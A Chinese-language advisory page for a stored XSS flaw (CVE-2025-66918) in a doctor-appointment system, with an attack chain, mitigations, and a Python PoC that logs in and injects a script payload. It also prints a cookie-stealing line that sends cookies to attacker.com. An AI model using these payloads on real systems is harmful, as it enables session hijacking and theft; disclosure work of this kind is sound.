CVE-2025-66918: edoc-doctor-appointment-system XSS漏洞

漏洞信息

漏洞编号

CVE-2025-66918

漏洞类型

跨站脚本攻击(XSS)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

edoc-doctor-appointment-system

漏洞概述

CVE-2025-66918是edoc-doctor-appointment-system v1.0.1版本中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞位于管理后台的admin/add-session.php文件中的title参数。由于应用程序未对用户输入进行充分的过滤和转义，攻击者可以通过在title参数中注入恶意JavaScript代码，当其他管理员访问相关页面时，恶意脚本将在受害者浏览器中执行。这可能导致会话劫持、敏感信息窃取、管理员权限滥用等严重安全问题。由于该漏洞存在于管理后台，攻击者需要具备低权限的管理员账户即可利用此漏洞发起攻击，对系统的机密性、完整性和可用性造成严重影响。CVSS评分达到8.8，属于高危漏洞，建议尽快采取修复措施。

技术细节

edoc-doctor-appointment-system v1.0.1的管理后台存在存储型XSS漏洞。在admin/add-session.php页面中，title参数接收用户输入后未经过滤直接存储到数据库。当管理员或医生访问会话列表页面时，未经过滤的恶意脚本会被浏览器解析执行。攻击者可以利用此漏洞窃取管理员的会话cookie，进而获取管理员权限。漏洞利用过程如下：首先攻击者需要登录低权限管理员账户，然后构造包含恶意JavaScript代码的title参数值（如：<script>alert(document.cookie)</script>），提交后在相应页面触发XSS。该漏洞属于存储型XSS，比反射型XSS危害更大，因为恶意脚本会持久保存在服务器端，所有访问该页面的用户都会受到影响。攻击者还可能通过XSS漏洞进行钓鱼攻击、植入恶意软件或进行横向移动。

攻击链分析

STEP 1

步骤1

攻击者获取低权限管理员账户凭据，登录edoc-doctor-appointment-system管理后台

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的XSS payload，利用title参数注入到admin/add-session.php页面

STEP 3

步骤3

恶意脚本被存储到数据库中，当其他管理员或用户访问相关页面时触发执行

STEP 4

步骤4

攻击者通过XSS漏洞窃取受害者cookie或进行其他恶意操作，实现会话劫持或敏感信息窃取

STEP 5

步骤5

攻击者利用窃取的会话冒充管理员，进一步控制整个系统或进行横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-66918 PoC - Stored XSS in edoc-doctor-appointment-system
# Target: admin/add-session.php via title parameter

def exploit_xss(target_url, username, password):
    """
    Exploit stored XSS vulnerability in edoc-doctor-appointment-system
    """
    session = requests.Session()
    
    # Step 1: Login to admin panel
    login_url = f"{target_url}/login.php"
    login_data = {
        'username': username,
        'password': password
    }
    
    try:
        response = session.post(login_url, data=login_data)
        
        # Step 2: Inject XSS payload via title parameter
        xss_payload = '<script>alert(document.cookie)</script>'
        add_session_url = f"{target_url}/admin/add-session.php"
        session_data = {
            'title': xss_payload,
            'description': 'Test session',
            'doctor': '1',
            'date': '2025-01-01',
            'time': '09:00',
            'submit': 'submit'
        }
        
        response = session.post(add_session_url, data=session_data)
        print(f"[+] XSS payload sent: {xss_payload}")
        print(f"[+] Visit admin/add-session.php to trigger the XSS")
        
        # Alternative payloads for session hijacking
        cookie_stealer = '<script>document.location="http://attacker.com/steal.php?c="+document.cookie</script>'
        print(f"\n[+] Cookie stealing payload: {cookie_stealer}")
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve-2025-66918.py <target_url> <username> <password>")
        print("Example: python cve-2025-66918.py http://localhost admin password123")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit_xss(target, user, pwd)

影响范围

edoc-doctor-appointment-system v1.0.1

防御指南

临时缓解措施

在等待官方修复期间，可以采取以下临时缓解措施：1)限制管理后台访问权限，仅允许受信任的IP地址访问；2)对admin/add-session.php页面实施额外的身份验证机制；3)使用Web应用防火墙(WAF)规则过滤恶意XSS payload；4)对所有用户输入实施严格的输入验证；5)监控和记录管理后台的所有操作日志，及时发现异常行为。建议尽快升级到官方发布的安全补丁版本。